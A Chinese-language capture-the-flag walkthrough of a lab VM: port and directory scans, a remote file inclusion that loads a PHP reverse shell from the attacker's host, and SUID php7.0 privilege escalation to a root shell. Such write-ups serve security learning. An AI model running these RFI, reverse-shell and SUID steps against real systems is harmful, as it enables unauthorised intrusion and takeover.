quick

扫描一下：

阔以！

信息搜集

端口扫描

sudo nmap -Pn 10.0.2.8

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)

nmap -sV -sT -T4 -p- 10.0.2.8

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

看来真没东西了。

目录扫描

feroxbuster -u http://10.0.2.8

301      GET        9l       28w      305c http://10.0.2.8/images => http://10.0.2.8/images/
200      GET       88l      342w     3735c http://10.0.2.8/index.php
200      GET      314l     2467w   220000c http://10.0.2.8/images/logo.png
200      GET     2190l    12161w   863176c http://10.0.2.8/images/joe.jpeg
200      GET     2740l    14581w  1058919c http://10.0.2.8/images/jane.jpeg
200      GET      134l      799w    59813c http://10.0.2.8/images/pexels-adrian-newell-6968984.jpg
200      GET      255l     1417w   103988c http://10.0.2.8/images/pexels-mike-bird-190537.jpg
200      GET      261l      453w     4038c http://10.0.2.8/styles.css
200      GET       88l      342w     3735c http://10.0.2.8/
200      GET     1795l    10935w   818584c http://10.0.2.8/images/pexels-pixabay-38570.jpg
200      GET      157l      983w    66146c http://10.0.2.8/images/pexels-ishan-kulshrestha-9334971.jpg

以防万一FUZZ一下：

ffuf -u http://10.0.2.8/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

images                  [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 115ms]
server-status           [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 0ms]

没啥东西了，开撤！

漏洞扫描

nikto -h http://10.0.2.8

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.2.8
+ Target Hostname:    10.0.2.8
+ Target Port:        80
+ Start Time:         2024-03-20 13:20:16 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /images/: Directory indexing found.
+ /index.php: Output from the phpinfo() function was found.
+ /index.php?page=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2024-03-20 13:20:33 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

漏洞利用

RFI漏洞利用

扫出来了一个RFI漏洞：

http://10.0.2.8/index.php?page=http://10.0.2.4:8888/webshell

# head webshell.php
<?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '10.0.2.8';  // You have changed this
  $port = 1234;  // And this
  $chunk_size = 1400;

实际上，就算没有打全，只打前几个字母，也可以请求到正确的文件！

提权

扩展shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

发现suid漏洞

这个php7.0明显有suid：https://gtfobins.github.io/gtfobins/php/

/usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"

寻找flag